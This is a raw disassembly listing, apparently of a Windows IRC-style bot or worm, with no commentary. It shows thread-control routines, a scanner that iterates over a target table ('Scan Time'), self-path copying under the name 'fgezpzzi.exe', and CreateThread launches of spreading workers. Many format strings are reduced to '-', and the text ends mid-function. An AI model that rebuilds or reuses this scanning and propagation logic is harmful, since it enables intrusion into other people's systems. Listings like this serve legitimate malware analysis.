sub_40B648 proc near ; CODE XREF: sub_401ACD+123D�p
; sub_401ACD+125B�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
Str = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+Str], eax
jz short loc_40B661
push [ebp+Str] ; Str
call _atoi
pop ecx
loc_40B661: ; CODE XREF: sub_40B648+E�j
push eax
push [ebp+arg_18]
call sub_40B5B5
pop ecx
test eax, eax
pop ecx
jle short loc_40B68D
push eax
lea eax, [ebp+Dest]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_40B6A7
; ---------------------------------------------------------------------------
loc_40B68D: ; CODE XREF: sub_40B648+26�j
push [ebp+arg_14]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax ; Dest
call _sprintf
add esp, 10h
loc_40B6A7: ; CODE XREF: sub_40B648+43�j
cmp [ebp+arg_C], 0
jnz short loc_40B6C7
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_40B6C7: ; CODE XREF: sub_40B648+63�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
leave
retn
sub_40B648 endp
; =============== S U B R O U T I N E =======================================
sub_40B6D6 proc near ; CODE XREF: sub_4017ED+159�p
; sub_40B425+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_43E924[eax], ecx
mov dword_43E910[eax], ecx
mov dword_43E914[eax], ecx
mov dword_43E918[eax], ecx
mov dword_43E91C[eax], ecx
mov dword_43E920[eax], ecx
mov byte ptr dword_43E710[eax], cl
mov byte_43E928[eax], cl
retn
sub_40B6D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B713 proc near ; CODE XREF: sub_401ACD+7C2B�p
; sub_40B841+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_40B71D: ; CODE XREF: sub_40B713+68�j
mov cl, [esi]
test cl, cl
jz short loc_40B77D
cmp eax, 1
jnz short loc_40B77D
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40B77D
cmp cl, 2Ah
jz short loc_40B764
cmp cl, 3Fh
jz short loc_40B747
cmp cl, 5Bh
jz short loc_40B74C
xor eax, eax
cmp cl, dl
setz al
loc_40B747: ; CODE XREF: sub_40B713+26�j
inc [ebp+arg_4]
jmp short loc_40B777
; ---------------------------------------------------------------------------
loc_40B74C: ; CODE XREF: sub_40B713+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_40B7A9
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40B777
; ---------------------------------------------------------------------------
loc_40B764: ; CODE XREF: sub_40B713+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40B841
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_40B777: ; CODE XREF: sub_40B713+37�j
; sub_40B713+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_40B71D
; ---------------------------------------------------------------------------
loc_40B77D: ; CODE XREF: sub_40B713+E�j
; sub_40B713+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_40B78D
cmp eax, 1
jnz short loc_40B7A4
inc esi
mov [ebp+arg_0], esi
jmp short loc_40B77D
; ---------------------------------------------------------------------------
loc_40B78D: ; CODE XREF: sub_40B713+6D�j
cmp eax, 1
jnz short loc_40B7A4
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40B7A4
cmp byte ptr [esi], 0
jnz short loc_40B7A4
push 1
pop eax
jmp short loc_40B7A6
; ---------------------------------------------------------------------------
loc_40B7A4: ; CODE XREF: sub_40B713+72�j
; sub_40B713+7D�j ...
xor eax, eax
loc_40B7A6: ; CODE XREF: sub_40B713+8F�j
pop esi
pop ebp
retn
sub_40B713 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7A9 proc near ; CODE XREF: sub_40B713+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40B7CA
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40B7CA: ; CODE XREF: sub_40B7A9+19�j
push ebx
push esi
loc_40B7CC: ; CODE XREF: sub_40B7A9+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40B7DA
cmp [ebp+var_4], eax
jnz short loc_40B826
loc_40B7DA: ; CODE XREF: sub_40B7A9+2A�j
test edi, edi
jnz short loc_40B81B
cmp bl, 2Dh
jnz short loc_40B80F
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_40B80F
cmp al, 5Dh
jz short loc_40B80F
cmp [ebp+var_4], edi
jnz short loc_40B80F
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40B81B
cmp bl, al
jg short loc_40B81B
push 1
mov [edx], esi
pop edi
jmp short loc_40B81B
; ---------------------------------------------------------------------------
loc_40B80F: ; CODE XREF: sub_40B7A9+38�j
; sub_40B7A9+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40B81B
push 1
pop edi
loc_40B81B: ; CODE XREF: sub_40B7A9+33�j
; sub_40B7A9+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_40B7CC
; ---------------------------------------------------------------------------
loc_40B826: ; CODE XREF: sub_40B7A9+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40B833
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40B833: ; CODE XREF: sub_40B7A9+82�j
cmp edi, eax
jnz short loc_40B83C
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40B83C: ; CODE XREF: sub_40B7A9+8C�j
mov eax, edi
pop edi
leave
retn
sub_40B7A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B841 proc near ; CODE XREF: sub_40B713+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_40B85D: ; CODE XREF: sub_40B841+3A�j
cmp [eax], bl
jz short loc_40B87D
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_40B872
cmp cl, 2Ah
jnz short loc_40B87D
cmp cl, 3Fh
jnz short loc_40B875
loc_40B872: ; CODE XREF: sub_40B841+25�j
inc eax
mov [edi], eax
loc_40B875: ; CODE XREF: sub_40B841+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_40B85D
; ---------------------------------------------------------------------------
loc_40B87D: ; CODE XREF: sub_40B841+1E�j
; sub_40B841+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_40B888
inc dword ptr [esi]
jmp short loc_40B87D
; ---------------------------------------------------------------------------
loc_40B888: ; CODE XREF: sub_40B841+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_40B8A9
mov edx, [esi]
cmp [edx], bl
jz short loc_40B89A
xor eax, eax
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B89A: ; CODE XREF: sub_40B841+53�j
cmp cl, bl
jnz short loc_40B8A9
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_40B8A9
push 1
pop eax
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B8A9: ; CODE XREF: sub_40B841+4D�j
; sub_40B841+5B�j ...
push eax
push dword ptr [esi]
call sub_40B713
pop ecx
test eax, eax
pop ecx
jnz short loc_40B8F3
loc_40B8B7: ; CODE XREF: sub_40B841+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_40B8BB: ; CODE XREF: sub_40B841+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_40B8D3
cmp cl, 5Bh
jz short loc_40B8D3
cmp dl, bl
jz short loc_40B8D3
inc eax
mov [edi], eax
jmp short loc_40B8BB
; ---------------------------------------------------------------------------
loc_40B8D3: ; CODE XREF: sub_40B841+82�j
; sub_40B841+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_40B8EA
push eax
push dword ptr [esi]
call sub_40B713
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B8EF
; ---------------------------------------------------------------------------
loc_40B8EA: ; CODE XREF: sub_40B841+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40B8EF: ; CODE XREF: sub_40B841+A7�j
cmp eax, ebx
jnz short loc_40B8B7
loc_40B8F3: ; CODE XREF: sub_40B841+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40B906
mov eax, [esi]
cmp [eax], bl
jnz short loc_40B906
mov [ebp+var_4], 1
loc_40B906: ; CODE XREF: sub_40B841+B6�j
; sub_40B841+BC�j
mov eax, [ebp+var_4]
loc_40B909: ; CODE XREF: sub_40B841+57�j
; sub_40B841+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B841 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B90E(int,char *Str,int)
sub_40B90E proc near ; CODE XREF: sub_401ACD+2AB2�p
Source = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+Dest]
push offset asc_431B94 ; "-"
push eax ; Dest
xor ebx, ebx
call _sprintf
cmp dword_4317F8, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40B980
push esi
mov esi, offset dword_431800
loc_40B941: ; CODE XREF: sub_40B90E+6F�j
mov eax, [esi]
test eax, eax
jbe short loc_40B976
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+Source]
push offset asc_431B88 ; " "
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esp, 1Ch
loc_40B976: ; CODE XREF: sub_40B90E+37�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40B941
pop esi
loc_40B980: ; CODE XREF: sub_40B90E+2B�j
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
push ebx
lea eax, [ebp+Source]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 34h
pop edi
pop ebx
leave
retn
sub_40B90E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B9DD(int,char *Str,int)
sub_40B9DD proc near ; CODE XREF: sub_401ACD+2A9C�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, dword_4CE4E0
mov ecx, dword_4CE4DC
push esi
push dword_4CB714
lea esi, [ecx+eax]
call sub_41ADD8
pop ecx
push eax
push esi
push dword_4CE4E0
lea eax, [ebp+Dest]
push dword_4CE4DC
push offset asc_431BB4 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 30h
pop esi
leave
retn
sub_40B9DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BA49(int,char *Str,int)
sub_40BA49 proc near ; CODE XREF: sub_401ACD+2A86�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
lea eax, [ebp+Dest]
push dword_4CE718
push offset asc_431BFC ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 28h
leave
retn
sub_40BA49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BA9E(int,char *Str,int)
sub_40BA9E proc near ; CODE XREF: sub_401ACD+2A70�p
Source = byte ptr -1000h
Dest = byte ptr -800h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call __alloca_probe
push edi
lea eax, [ebp+Dest]
push offset asc_431C48 ; "-"
push eax ; Dest
call _sprintf
cmp dword_4317F8, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40BB0A
push esi
mov esi, offset aSymantec ; "Symantec"
loc_40BAD3: ; CODE XREF: sub_40BA9E+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+Source]
push offset asc_431C38 ; " "
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40BAD3
pop esi
loc_40BB0A: ; CODE XREF: sub_40BA9E+2D�j
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
lea eax, [ebp+Source]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 30h
pop edi
leave
retn
sub_40BA9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB65 proc near ; DATA XREF: sub_401ACD+309A�o
Dest = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
Format = byte ptr -134h
Str = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3F0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+Format]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+Format]
push eax
call dword_4CBA14 ; inet_addr
xor edi, edi
mov [ebp+var_8], eax
cmp dword_4317F8, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], edi
jz loc_40BCC7
mov ebx, offset dword_4317F8
mov eax, ebx
loc_40BBB6: ; CODE XREF: sub_40BB65+15C�j
push [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_8]
call sub_40C34B
add esp, 0Ch
cmp eax, 1
jnz loc_40BCB7
push dword ptr [ebx]
lea esi, [ebx-28h]
lea eax, [ebp+Format]
push eax
lea eax, [esi+0Ah]
push eax
lea eax, [ebp+Dest]
push offset asc_431C98 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_24] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 2Ch
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+var_1EC]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_15C]
pop ecx
push esi ; Format
push eax ; Dest
call _sprintf
cmp [ebp+var_A4], 0
pop ecx
pop ecx
lea eax, [ebp+var_A4]
jnz short loc_40BC52
lea eax, [ebp+Str]
loc_40BC52: ; CODE XREF: sub_40BB65+E5�j
push eax ; Format
lea eax, [ebp+var_1DC]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_1F0], eax
mov eax, [ebp+var_14]
mov [ebp+var_140], eax
mov eax, [ebp+var_10]
pop ecx
mov [ebp+var_13C], eax
mov eax, [ebx]
sub esp, 0BCh
mov [ebp+var_150], eax
mov eax, [ebp+var_18]
push 2Fh
mov [ebp+var_14C], eax
mov eax, [ebp+arg_0]
pop ecx
lea esi, [ebp+var_1F0]
mov edi, esp
mov [ebp+var_148], eax
rep movsd
call dword ptr [ebx+4]
add esp, 0BCh
inc [ebp+var_4]
xor edi, edi
loc_40BCB7: ; CODE XREF: sub_40BB65+64�j
inc [ebp+arg_0]
add ebx, 40h
mov eax, ebx
cmp [ebx], edi
jnz loc_40BBB6
loc_40BCC7: ; CODE XREF: sub_40BB65+44�j
push [ebp+var_4]
lea eax, [ebp+Format]
push eax
lea eax, [ebp+Dest]
push offset asc_431C64 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_24] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_18]
call sub_40B6D6
add esp, 2Ch
push edi
call ds:dword_4270D4 ; ExitThread
sub_40BB65 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BD1A(int,char *Str,int,int)
sub_40BD1A proc near ; CODE XREF: sub_401ACD+23F4�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B602
test eax, eax
pop ecx
jle short loc_40BD56
mov eax, [ebp+arg_C]
push dword_4CBB20[eax*8]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_431CE8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40BD69
; ---------------------------------------------------------------------------
loc_40BD56: ; CODE XREF: sub_40BD1A+13�j
lea eax, [ebp+Dest]
push offset asc_431CC8 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40BD69: ; CODE XREF: sub_40BD1A+3A�j
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 18h
leave
retn
sub_40BD1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BD91(int,int,int,int,char Format,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40BD91 proc near ; CODE XREF: sub_40C600+4F�p
var_210 = dword ptr -210h
Source = byte ptr -204h
var_4 = byte ptr -4
Format = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40C263
shl eax, 6
xor ebx, ebx
cmp dword_431804[eax], ebx
jz loc_40C263
push 5
call sub_40B602
test eax, eax
pop ecx
jnz loc_40C018
mov eax, dword_429078
push edi
mov esi, offset dword_4CDBDC
push 104h
push esi
push ebx
mov dword_4CDDEC, eax
mov dword_4CDDE8, ebx
call ds:dword_427078 ; GetModuleFileNameA
mov edi, offset Str ; "fgezpzzi.exe"
push 103h ; Count
push edi ; Source
push offset byte_4CDCE0 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4CDBD8, eax
mov eax, [ebp+arg_138]
push 7Fh ; Count
mov dword_4CDE70, eax
jnz short loc_40BE44
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4CDDF0 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4CDE74, 1
jmp short loc_40BE5E
; ---------------------------------------------------------------------------
loc_40BE44: ; CODE XREF: sub_40BD91+94�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4CDDF0 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4CDE74, ebx
loc_40BE5E: ; CODE XREF: sub_40BD91+B1�j
push esi
lea eax, [ebp+Source]
push dword_4CDDEC
push offset asc_42C204 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 5 ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov dword_4CDDE4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDBD8
push offset sub_412197
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CDDE4
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40BECC
loc_40BEBA: ; CODE XREF: sub_40BD91+139�j
cmp dword_4CDE78, ebx
jnz short loc_40BEE7
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40BEBA
; ---------------------------------------------------------------------------
loc_40BECC: ; CODE XREF: sub_40BD91+127�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_431E08 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40BEE7: ; CODE XREF: sub_40BD91+12F�j
lea eax, [ebp+Source]
push eax
call sub_415D38
mov eax, dword_4CB710
mov esi, offset dword_4CDE84
mov [esp+210h+var_210], 104h
push esi
push ebx
mov dword_4CE094, eax
mov dword_4CE090, ebx
call ds:dword_427078 ; GetModuleFileNameA
push 103h ; Count
push edi ; Source
push offset byte_4CDF88 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4CDE80, eax
mov eax, [ebp+arg_138]
pop edi
mov dword_4CE118, eax
push 7Fh ; Count
jnz short loc_40BF68
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4CE098 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4CE11C, 1
jmp short loc_40BF82
; ---------------------------------------------------------------------------
loc_40BF68: ; CODE XREF: sub_40BD91+1B8�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4CE098 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4CE11C, ebx
loc_40BF82: ; CODE XREF: sub_40BD91+1D5�j
push esi
lea eax, [ebp+Source]
push dword_4CE094
push offset asc_431DD4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 4 ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov dword_4CE08C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDE80
push offset sub_40F3AA
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CE08C
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40BFF0
loc_40BFDE: ; CODE XREF: sub_40BD91+25D�j
cmp dword_4CE120, ebx
jnz short loc_40C00B
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40BFDE
; ---------------------------------------------------------------------------
loc_40BFF0: ; CODE XREF: sub_40BD91+24B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_431DA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C00B: ; CODE XREF: sub_40BD91+253�j
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
loc_40C018: ; CODE XREF: sub_40BD91+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp dword_43180C[ecx], ebx
jz loc_40C141
push 7
call sub_40B602
test eax, eax
pop ecx
jnz loc_40C13B
mov eax, dword_4CE710
cmp [ebp+arg_90], bl
mov dword_4CDB44, eax
mov eax, [ebp+arg_110]
mov dword_4CDB38, eax
mov eax, [ebp+arg_138]
mov dword_4CDB40, ebx
mov dword_4CDBC8, eax
push 7Fh ; Count
jnz short loc_40C08C
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4CDB48 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4CDBCC, 1
jmp short loc_40C0A6
; ---------------------------------------------------------------------------
loc_40C08C: ; CODE XREF: sub_40BD91+2DC�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4CDB48 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4CDBCC, ebx
loc_40C0A6: ; CODE XREF: sub_40BD91+2F9�j
push dword_4CDB44
lea eax, [ebp+Source]
push offset asc_431D70 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 7 ; int
push eax ; Source
call sub_40B3BA
add esp, 18h
mov dword_4CDB3C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDB38
push offset sub_40F108
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CDB3C
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40C113
loc_40C101: ; CODE XREF: sub_40BD91+380�j
cmp dword_4CDBD0, ebx
jnz short loc_40C12E
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40C101
; ---------------------------------------------------------------------------
loc_40C113: ; CODE XREF: sub_40BD91+36E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_431D38 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C12E: ; CODE XREF: sub_40BD91+376�j
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
loc_40C13B: ; CODE XREF: sub_40BD91+2A8�j
mov eax, [ebp+arg_130]
loc_40C141: ; CODE XREF: sub_40BD91+298�j
shl eax, 6
cmp dword_431808[eax], ebx
jz loc_40C263
push 3
call sub_40B602
test eax, eax
pop ecx
jnz loc_40C263
mov esi, offset byte_4CE3B4
push 104h
push esi
push ebx
call ds:dword_427078 ; GetModuleFileNameA
push 5Ch ; Ch
push esi ; Str
call _strrchr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40C182
mov [eax], bl
loc_40C182: ; CODE XREF: sub_40BD91+3ED�j
mov eax, dword_42907C
mov dword_4CE4CC, ebx
mov dword_4CE4B8, eax
lea eax, [ebp+Format]
push eax ; Format
push offset byte_4CE12C ; Dest
call _sprintf
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_4CE128, eax
mov ecx, [ebp+arg_138]
push esi
push dword_4CE4B8
mov dword_4CE4C4, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4CE4C8, ecx
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Source]
push offset asc_42C18C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov dword_4CE4C0, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CE128
push offset sub_40FAD6
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, dword_4CE4C0
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40C23B
loc_40C229: ; CODE XREF: sub_40BD91+4A8�j
cmp dword_4CE4D4, ebx
jnz short loc_40C256
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40C229
; ---------------------------------------------------------------------------
loc_40C23B: ; CODE XREF: sub_40BD91+496�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_431D04 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C256: ; CODE XREF: sub_40BD91+49E�j
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
